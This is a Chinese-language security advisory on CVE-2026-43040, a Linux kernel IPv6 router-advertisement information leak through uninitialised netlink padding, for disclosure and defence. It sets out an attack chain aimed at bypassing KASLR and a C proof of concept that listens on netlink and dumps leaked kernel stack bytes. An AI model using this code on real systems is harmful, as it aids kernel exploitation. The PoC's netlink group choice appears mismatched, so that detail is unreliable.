CVE-2026-43040 Linux内核IPv6信息泄露

漏洞信息

漏洞编号

CVE-2026-43040

漏洞类型

信息泄露

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的IPv6邻居发现协议（NDISC）组件中存在一个高危信息泄露漏洞（CVE-2026-43040）。该漏洞源于在处理带有用户选项的路由器通告（RA）时，内核构建的RTM_NEWNDUSEROPT netlink消息中包含未初始化的内存填充字段。具体而言，nduseroptmsg结构体中的三个填充字段未被清零，导致其保留了内核栈上的旧数据。具有本地低权限的攻击者可以通过监听netlink消息获取这些未初始化的数据，从而造成内核内存信息泄露。该漏洞CVSS v3.1评分为7.1，虽然不需要用户交互且利用难度较低，但由于需要本地访问权限，其危害主要在于作为进一步攻击的信息收集手段。

技术细节

该漏洞位于Linux内核的net/ipv6/ndisc.c文件中，具体涉及`ndisc_ra_useropt`函数。当网络接口接收到IPv6路由器通告（RA）且其中包含用户选项时，内核需要将此信息通过Netlink套接字通知用户空间守护进程。为此，内核会在栈上分配一个`nduseroptmsg`结构体。

结构体定义中包含了`nduseropt_pad1`、`nduseropt_pad2`和`nduseropt_pad3`三个填充字段，用于字节对齐。然而，在旧代码逻辑中，仅仅声明了该结构体变量，并未使用memset或初始化器将这些填充区域清零。由于栈内存是复用的，这些填充字段中可能残留着之前函数调用留下的敏感数据（如内核指针、函数返回地址或其他进程的数据）。

当内核通过netlink协议将这个结构体发送给用户空间时，未初始化的内存内容随消息一同被发送。攻击者只需拥有本地低权限账号，并创建一个监听RTM_NEWNDUSEROPT消息的Netlink套接字，即可捕获这些数据包。通过分析捕获到的消息载荷中的特定偏移量（即padding字段的位置），攻击者可以解析出泄露的内核内存内容，从而绕过KASLR（内核地址空间随机化）等安全防御机制，为后续的本地提权或内核攻击奠定基础。修复方案非常直接，即在发送消息前显式地将整个结构体或特定的padding字段置零。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者需要在目标系统上拥有低权限的本地访问能力（PR:L），以能够创建Socket监听网络消息。

STEP 2

2. 监听Netlink消息

攻击者运行恶意程序，创建一个NETLINK_ROUTE套接字，并加入RTMGRP_IPV6_NEIGH组，监听RTM_NEWNDUSEROPT消息。

STEP 3

3. 触发内核处理RA

等待或触发系统接收IPv6路由器通告（RA）消息。这通常由网络中的路由器周期性发送，或攻击者通过本地IPv6网络发送伪造的RA包触发。

STEP 4

4. 接收并解析泄露数据

内核调用ndisc_ra_useropt处理RA，构建包含未初始化Padding的Netlink消息。攻击者捕获该消息，提取Padding字段中的残留内核栈数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43040
 * Compile: gcc poc.c -o poc
 * Description: This program listens for RTM_NEWNDUSEROPT messages
 * and dumps the payload to inspect uninitialized kernel memory.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 4096

int main() {
    int sock_fd;
    struct sockaddr_nl sa;
    char buffer[BUFFER_SIZE];
    int len;

    // Create Netlink socket
    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sock_fd < 0) {
        perror("socket");
        return -1;
    }

    // Bind to RTMGRP_IPV6_NEIGH to catch ND useropts
    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;
    sa.nl_groups = RTMGRP_IPV6_NEIGH;
    sa.nl_pid = getpid();

    if (bind(sock_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(sock_fd);
        return -1;
    }

    printf("[+] Listening for RTM_NEWNDUSEROPT messages to leak kernel data...\n");
    printf("[+] Trigger an IPv6 Router Advertisement to generate the message.\n");

    while (1) {
        len = recv(sock_fd, buffer, BUFFER_SIZE, 0);
        if (len < 0) {
            perror("recv");
            continue;
        }

        struct nlmsghdr *nh = (struct nlmsghdr *)buffer;
        if (nh->nlmsg_type == RTM_NEWNDUSEROPT) {
            printf("\n[!] Caught RTM_NEWNDUSEROPT! Dumping payload (check for non-zero padding):\n");
            // Print raw payload to look for leaking data
            // In a real exploit, one would parse nduseroptmsg and check padding offsets
            for(int i = 0; i < len; i++) {
                printf("%02x ", (unsigned char)buffer[i]);
                if ((i + 1) % 16 == 0) printf("\n");
            }
            printf("\n");
        }
    }

    close(sock_fd);
    return 0;
}

影响范围

Linux Kernel (版本早于各stable分支修复补丁)

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过防火墙规则严格限制入站的IPv6路由器通告（ICMPv6 Type 134），或者在业务允许的情况下暂时禁用IPv6协议栈以阻断受影响的代码路径。